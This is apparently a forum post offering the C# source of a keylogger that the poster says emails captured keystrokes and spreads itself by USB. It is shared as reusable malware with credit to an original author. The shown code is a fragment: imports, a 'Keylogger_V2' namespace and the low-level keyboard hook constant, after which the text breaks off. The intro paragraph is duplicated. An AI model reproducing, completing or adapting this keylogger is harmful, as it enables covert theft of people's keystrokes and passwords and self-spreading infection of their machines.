This is a keylogger + email + usb spread written in c#
I can not take full credit for this program. Creds to the original author.
I have modified it a bit, but you get the idea.
Keylogger + Email + USB Spread Written in C#
I can not take full credit for this program. Creds to the original author.
I have modified it a bit, but you get the idea.
Code:
using System; using System.Diagnostics; using System.Timers; using System.Windows.Forms; using System.Runtime.InteropServices; using System.IO; using System.Net; using System.Net.Mail; using Microsoft.Win32; namespace Keylogger_V2 { class Program { private const int WH_KEYBOARD_LL = 13;...